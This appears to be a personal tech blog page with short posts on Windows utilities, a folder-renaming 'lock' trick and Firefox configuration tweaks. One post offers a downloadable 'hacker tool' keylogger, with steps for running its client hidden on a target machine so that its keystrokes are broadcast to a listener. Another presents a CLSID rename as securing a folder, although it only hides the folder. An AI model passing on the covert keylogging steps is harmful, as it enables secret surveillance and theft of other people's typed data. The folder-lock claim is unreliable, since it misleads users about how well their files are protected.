Search This Blog

Friday, December 30, 2011

My First Silverlight Application

My First Silverlight  Application


Sunday, April 3, 2011

Network machine Keystrokes Listener -Hacker tool


Network Listener is a type of interprocess communication that allows getting the key stork network machines. It’s a simple hacking tool but more powerful
There are 2 application are used for this process
  1. Rv_Server (Server Application) -Rv_Server.exe
  2. Rv_Client (Client Application) - Rv_Client.exe
Client Application can broadcast the keystrokes and server program can listen the keystrokes

 Steps to start read your network machine key strokes

  1. Run the Client Application to your target network machine after running this client application (don’t worry this program run only in background ) the keystrokes will be automatically broadcast to the network
  2. Run your Server Application to any other machine (client application should run in the same network) and click “Start Listen” button then your fun will start
* This application done only educational purpose 
* It's a demo version so this server application can listen only 100 characters

Downloads

Rv_Server.exe - 406.5 KB

Rv_Client.exe - 101.5 KB


Monday, February 21, 2011

Network shutdown

Rv Network shutdown Utility

Rv Network shutdown is a network solution that allow you to centrally manage PC in local network.
you can select any computer in a network and launch their shutdown,restart and force to close the remote application and you can display message on remote computer but the remote user can not cancel the shutdown operation

Click this below link to download application

RemoteShutdown.exe - 445.5 KB Enjoy...




Friday, January 21, 2011

Automatic Mouse clicker Application for Free


Automatic Mouse clicker Utility 

Its a simple and more powerful utility for automatic process for mouse click 

Click this below link to download application
 >>DOWNLOAD ... Enjoy<<


Advantages


1)It's used to click your mouse button automatically where every 
  you move in your screen 
2)It's used to automate the click at specific interval 
3)It's give u a fingers rest

Reason for Created this Utility 



i have used Farm ville on past 3 months this games depends on highly repetitive action (some hundreds of mouse clicks) it's makes me extremely bored and also i lost my mouse also so that i decided to create this utility

Click this below link to download application

Sunday, December 19, 2010

Simple Folder Lock

Very Simple method to secure your folder without use any software

Step 1: Go to Command Prompt

Step 2: Type the following command
          Syntax
            ren .{21EC2020-3AEA-1069-A2DD-08002B30309D}

         Example

            ren test test.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Step 3: After run this command the Test folder will be renamed. if you try to open this folder Control panel  
            will be opened

Step 4: If you want to Access the folder content then do the reverse process you will get it

             ren test.{21EC2020-3AEA-1069-A2DD-08002B30309D} test

Friday, December 17, 2010

Firefox tweaks Part II

Firefox having a lot of hidden Properties. By using this properties we can improve our browser performance  To view this Hidden properties do the following steps


1) Open the firefox
2) To get this hidden property type “about:config” at address bar
    ( if above 3.2 version you will get get warning information just click "I'll be careful, I Promise" Button
after that you can see the number of properties

1) Reduce the amount of RAM Firefox uses for its cache feature
         Find “browser.sessionhistory.max_total_viewer” and change the value into 0

2) Stop Displaying Website Icon (Favicon) in Address bar & On Tab
         browser.chrome.site_icons = False

3) Remove Tab Close Button from all Tab and set A single Close Button at Right
         browser.tabs.closeButtons = 3
         Single Close Button to control all Firefox Opened Tabs.

4) Disable Browser Toolbar Tip

         browser.chrome.toolbar_tips = False

5) Past Copy Content with Middle mouse Click

        middlemouse.paste = True

6) Increase History Undo Close Tab Limit ( Recently Closed Tabs )

         browser.sessionstore.max_tabs_undo=15

Thursday, December 16, 2010

Firefox Fun

Fun with Firefox Browser

Run Firefox Browser to Inside the Firefox:

chrome://browser/content/browser.xul

Copy the url and paste it to the firefox address bar 

have a fun ....

cheer
Ravi